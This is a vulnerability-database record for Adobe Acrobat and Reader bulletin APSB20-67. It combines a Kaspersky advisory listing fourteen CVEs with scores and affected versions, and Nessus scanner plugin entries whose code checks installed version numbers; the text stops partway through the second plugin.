{"id": "KLA11991", "type": "kaspersky", "bulletinFamily": "info", "title": "KLA11991 Multiple vulnerabilities in Adobe Acrobat and Adobe Acrobat Reader", "description": "### *Detect date*:\n11/03/2020\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Adobe Acrobat and Adobe Acrobat Reader. Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, cause denial of service.\n\n### *Affected products*:\nAdobe Acrobat DC Continuous earlier than 2020.013.20064 \nAdobe Acrobat 2020 Classic earlier than 2020.001.30010 \nAdobe Acrobat 2017 Classic earlier than 2017.011.30180 \nAdobe Acrobat Reader DC Continuous earlier than 2020.013.20064 \nAdobe Acrobat Reader 2020 Classic earlier than 2020.001.30010 \nAdobe Acrobat Reader 2017 Classic earlier than 2017.011.30180\n\n### *Solution*:\nUpdate to the latest version \n[Download Adobe Acrobat Reader DC](<https://get2.adobe.com/uk/reader/>)\n\n### *Original advisories*:\n[APSB20-67](<https://helpx.adobe.com/security/products/acrobat/apsb20-67.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Acrobat Reader DC Continuous](<https://threats.kaspersky.com/en/product/Adobe-Acrobat-Reader-DC-Continuous/>)\n\n### *CVE-IDS*:\n[CVE-2020-24429](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24429>)6.8High \n[CVE-2020-24435](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24435>)6.8High \n[CVE-2020-24436](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24436>)6.8High \n[CVE-2020-24439](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24439>)1.2Warning \n[CVE-2020-24431](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24431>)5.8High \n[CVE-2020-24437](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24437>)6.8High \n[CVE-2020-24428](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24428>)5.1High \n[CVE-2020-24433](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24433>)9.3Critical \n[CVE-2020-24434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24434>)4.3Warning \n[CVE-2020-24427](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24427>)4.3Warning \n[CVE-2020-24426](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24426>)4.3Warning \n[CVE-2020-24430](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24430>)6.8High \n[CVE-2020-24438](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24438>)4.3Warning \n[CVE-2020-24432](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24432>)6.8High", "published": "2020-11-03T00:00:00", "modified": "2020-11-16T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA11991/", "reporter": "Kaspersky Lab", "references": ["https://get2.adobe.com/uk/reader/", "https://helpx.adobe.com/security/products/acrobat/apsb20-67.html", "https://threats.kaspersky.com/en/product/Adobe-Acrobat-Reader-DC-Continuous/", "https://threats.kaspersky.com/en/product/Adobe-Acrobat-DC-Continuous/", "https://threats.kaspersky.com/en/product/Adobe-Acrobat-Reader-2017/", "https://threats.kaspersky.com/en/product/Adobe-Acrobat-2017/", "https://threats.kaspersky.com/en/product/Adobe-Acrobat-Reader-2020/", "https://threats.kaspersky.com/en/product/Adobe-Acrobat-2020/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24429", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24435", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24436", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24439", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24431", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24437", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24428", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24433", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24434", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24427", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24426", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24430", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24438", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24432", "https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"], "immutableFields": [], "lastseen": "2021-08-18T10:59:57", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "adobe", "idList": ["APSB20-67"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1122", "CPAI-2020-1123", "CPAI-2020-1126", "CPAI-2020-1127", "CPAI-2020-1128", "CPAI-2020-1129", "CPAI-2020-1130", "CPAI-2020-1131", "CPAI-2020-1132", "CPAI-2020-1136"]}, {"type": "cve", "idList": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"]}, {"type": "nessus", "idList": ["ADOBE_ACROBAT_APSB20-67.NASL", "ADOBE_READER_APSB20-67.NASL", "MACOS_ADOBE_ACROBAT_APSB20-67.NASL", "MACOS_ADOBE_READER_APSB20-67.NASL"]}, {"type": "talos", "idList": ["TALOS-2020-1156", "TALOS-2020-1157"]}, {"type": "thn", "idList": ["THN:0EF55AC7BD7B39F693C88E87CC622019"]}, {"type": "threatpost", "idList": ["THREATPOST:A2E3E8A3784C6F242EF67442B8BF3E81", "THREATPOST:E6E5A50C68621B44863933C4DBF4821C"]}, {"type": "zdi", "idList": ["ZDI-20-1354", "ZDI-20-1355", "ZDI-20-1356", "ZDI-20-1357"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "adobe", "idList": ["APSB20-67"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-1122", "CPAI-2020-1123", "CPAI-2020-1126", "CPAI-2020-1127", "CPAI-2020-1128", "CPAI-2020-1129", "CPAI-2020-1130", "CPAI-2020-1131", "CPAI-2020-1132", "CPAI-2020-1136"]}, {"type": "cve", "idList": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"]}, {"type": "nessus", "idList": ["ADOBE_ACROBAT_APSB20-67.NASL", "ADOBE_READER_APSB20-67.NASL", "MACOS_ADOBE_ACROBAT_APSB20-67.NASL"]}, {"type": "talos", "idList": ["TALOS-2020-1156", "TALOS-2020-1157"]}, {"type": "thn", "idList": ["THN:0EF55AC7BD7B39F693C88E87CC622019"]}, {"type": "threatpost", "idList": ["THREATPOST:A2E3E8A3784C6F242EF67442B8BF3E81", "THREATPOST:E6E5A50C68621B44863933C4DBF4821C"]}, {"type": "zdi", "idList": ["ZDI-20-1354", "ZDI-20-1355", "ZDI-20-1356", "ZDI-20-1357"]}]}, "exploitation": null, "vulnersScore": 6.9}, "_state": {"dependencies": 1647589307, "score": 0}}

{"nessus": [{"lastseen": "2021-10-02T00:05:42", "description": "The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30175, 2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a signature verification bypass that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This vulnerability could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input validation vulnerability that could result in arbitrary JavaScript execution in the context of the current user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67) (macOS)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"], "modified": "2021-02-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "MACOS_ADOBE_READER_APSB20-67.NASL", "href": "https://www.tenable.com/plugins/nessus/142465", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142465);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/25\");\n\n script_cve_id(\n \"CVE-2020-24426\",\n \"CVE-2020-24427\",\n \"CVE-2020-24428\",\n \"CVE-2020-24429\",\n \"CVE-2020-24430\",\n \"CVE-2020-24431\",\n \"CVE-2020-24432\",\n \"CVE-2020-24433\",\n \"CVE-2020-24434\",\n \"CVE-2020-24435\",\n \"CVE-2020-24436\",\n \"CVE-2020-24437\",\n \"CVE-2020-24438\",\n \"CVE-2020-24439\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0506-S\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67) (macOS)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote macOS host is a version prior or equal to 2017.011.30175,\n2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of\n sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result\n in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations\n such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious\n file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability\n that could result in local privilege escalation. Exploitation of this issue requires user interaction in\n that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a signature verification bypass that could result in local\n privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a\n malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This\n vulnerability could result in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library\n code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a\n victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input\n validation vulnerability that could result in arbitrary JavaScript execution in the context of the current\n user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is\n trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable\n a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code\n as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker\n must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function,\n potentially resulting in arbitrary code execution in the context of the current user. Exploitation\n requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of\n an allocated memory structure. An attacker could leverage this vulnerability to execute code in the\n context of the current user. This vulnerability requires user interaction to exploit in that the victim\n must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions\n that could result in arbitrary code execution in the context of the current user. Exploitation of this\n issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and\n 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security\n impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update\n process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/acrobat/apsb20-67.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 2017.011.30175 / 2020.001.30005 / 2020.012.20048 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-24433\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nget_kb_item_or_exit('Host/local_checks_enabled');\nos = get_kb_item('Host/MacOSX/Version');\nif (empty_or_null(os)) audit(AUDIT_OS_NOT, 'Mac OS X');\n\napp_info = vcf::get_app_info(app:'Adobe Reader');\n\n# vcf::adobe_reader::check_version_and_report will\n# properly separate tracks when checking constraints.\n# x.y.30zzz = DC Classic\n# x.y.20zzz = DC Continuous\nconstraints = [\n { 'min_version' : '15.7', 'max_version' : '20.012.20048', 'fixed_version' : '20.013.20064' },\n { 'min_version' : '20.1', 'max_version' : '20.001.30005', 'fixed_version' : '20.001.30010' },\n { 'min_version' : '17.8', 'max_version' : '17.011.30175', 'fixed_version' : '17.011.30180' }\n];\nvcf::adobe_reader::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, max_segs:3);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-02T00:04:35", "description": "The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30175, 2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition vulnerability that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24428)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a signature verification bypass that could result in local privilege escalation. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24429)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability when handling malicious JavaScript. This vulnerability could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a malicious file. (CVE-2020-24430)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) for macOS are affected by a security feature bypass that could result in dynamic library code injection by the Adobe Reader process. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24431)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) and Adobe Acrobat Pro DC 2017.011.30175 (and earlier) are affected by an improper input validation vulnerability that could result in arbitrary JavaScript execution in the context of the current user. To exploit this issue, an attacker must acquire and then modify a certified PDF document that is trusted by the victim. The attacker then needs to convince the victim to open the document.\n (CVE-2020-24432)\n\n - Adobe Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a local privilege escalation vulnerability that could enable a user without administrator privileges to delete arbitrary files and potentially execute arbitrary code as SYSTEM. Exploitation of this issue requires an attacker to socially engineer a victim, or the attacker must already have some access to the environment. (CVE-2020-24433)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a heap-based buffer overflow vulnerability in the submitForm function, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .pdf file in Acrobat Reader.\n (CVE-2020-24435)\n\n - Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document. (CVE-2020-24436)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability in the processing of Format event actions that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. (CVE-2020-24437)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a use-after-free vulnerability that could result in a memory address leak.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24438)\n\n - Acrobat Reader DC for macOS versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by a security feature bypass. While the practical security impact is minimal, a defense-in-depth fix has been implemented to further harden the Adobe Reader update process. (CVE-2020-24439)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "Adobe Reader <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-24426", "CVE-2020-24427", "CVE-2020-24428", "CVE-2020-24429", "CVE-2020-24430", "CVE-2020-24431", "CVE-2020-24432", "CVE-2020-24433", "CVE-2020-24434", "CVE-2020-24435", "CVE-2020-24436", "CVE-2020-24437", "CVE-2020-24438", "CVE-2020-24439"], "modified": "2021-02-25T00:00:00", "cpe": ["cpe:/a:adobe:acrobat_reader"], "id": "ADOBE_READER_APSB20-67.NASL", "href": "https://www.tenable.com/plugins/nessus/142467", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142467);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/25\");\n\n script_cve_id(\n \"CVE-2020-24426\",\n \"CVE-2020-24427\",\n \"CVE-2020-24428\",\n \"CVE-2020-24429\",\n \"CVE-2020-24430\",\n \"CVE-2020-24431\",\n \"CVE-2020-24432\",\n \"CVE-2020-24433\",\n \"CVE-2020-24434\",\n \"CVE-2020-24435\",\n \"CVE-2020-24436\",\n \"CVE-2020-24437\",\n \"CVE-2020-24438\",\n \"CVE-2020-24439\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0506-S\");\n\n script_name(english:\"Adobe Reader <= 2017.011.30175 / 2020.001.30005 / 2020.012.20048 Multiple Vulnerabilities (APSB20-67)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Windows host is a version prior or equal to 2017.011.30175,\n2020.001.30005, or 2020.012.20048. It is, therefore, affected by multiple vulnerabilities.\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of\n sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR.\n Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n (CVE-2020-24426, CVE-2020-24434)\n\n - Acrobat Reader versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and\n earlier) are affected by an input validation vulnerability when decoding a crafted codec that could result\n in the disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations\n such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious\n file. (CVE-2020-24427)\n\n - Acrobat Reader DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175\n (and earlier) for macOS are affected by a time-of-check time-of-use (TOCTOU) race condition 